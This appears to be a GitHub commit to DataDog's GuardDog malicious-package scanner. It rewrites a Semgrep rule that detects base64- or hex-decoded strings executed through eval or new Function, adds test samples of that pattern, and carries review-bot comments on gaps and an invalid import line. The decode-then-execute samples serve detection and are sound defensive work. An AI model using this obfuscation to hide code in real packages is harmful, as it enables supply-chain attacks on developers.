
Commit 217a20e

authored
Merge pull request #456 from DataDog/s.obregoso/FN_npm-exec-base64
FN: Adding a new detection case to npm-exec-base64
2 parents bed12d1 + 247b6ea commit 217a20e


2 files changed

+27
-7
lines changed


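--- a/guarddog/analyzer/sourcecode/npm-exec-base64.yml
+++ b/guarddog/analyzer/sourcecode/npm-exec-base64.yml
@@ -9,8 +9,17 @@ rules:
 languages:
 - javascript
 severity: WARNING
-patterns:
-- pattern-not: eval('...')
-- pattern-not: eval("...")
-- pattern-not: eval(`...`)
-- pattern: eval(atob(...))
+mode: taint
+pattern-sources:
+- pattern-either:
+- pattern: Buffer.from(...)
+- pattern: atob(...)
+pattern-sinks:
+- pattern-either:
+- patterns:
+- pattern-inside: |
+$FN = new Function(...)
+...
+- pattern: $FN(...)
+- patterns:
+- pattern: eval(...)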
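Review bot: The `new Function` sink only matches a call through a variable previously assigned from `new Function(...)`, so decoded data reaching the constructor is reported only when that assign-then-call shape follows; a constructor result that is invoked directly, or `Function(...)` without `new`, does not appear to be covered by any pattern in this hunk. Since the constructor is the point where the decoded string becomes code, I would add it as a sink alternative under `pattern-sinks`, e.g. `- pattern: new Function(...)`, and keep the `$FN(...)` case only if the finding should be located on the call. The last alternative wraps a single `- pattern: eval(...)` in `patterns:`, which can be written as the bare pattern. The rule's id and message lie outside the hunk; if they still describe base64 only, they should mention that `Buffer.from(...)` with any encoding is now a source.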
Lines changed: 13 additions & 2 deletions
@@ -1,2 +1,13 @@
1-
// ruleid: npm-exec-base64
2-
eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"))
1+
function f(){
2+
// ruleid: npm-exec-base64
3+
eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"));
4+
}
5+
6+
function f() {
7+
import fetch from "node-fetch"
8+
const admin = "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"
9+
const adminResult = Buffer.from(admin, 'hex').toString('utf8');
10+
const func = new Function(adminResult);
11+
// ruleid: npm-exec-base64
12+
func(adminResult);
13+
}
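Review bot: The second test function places `import fetch from "node-fetch"` inside a function body, which is not valid JavaScript (import declarations are only allowed at module top level), and `fetch` is never used; the case then depends on the parser's error recovery, so I would drop that line. Both test functions are named `f`, and distinct names would make a failing case easier to identify. The commit removes the `pattern-not: eval('...')` exclusions from the rule and nothing here pins the resulting behaviour, so I would add a negative case such as `// ok: npm-exec-base64` followed by `eval("console.log(1)");`. `func(adminResult)` passes the decoded string as an argument, which is presumably what taints the call expression; a second case that calls `func()` with no argument would show whether the rule depends on that.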
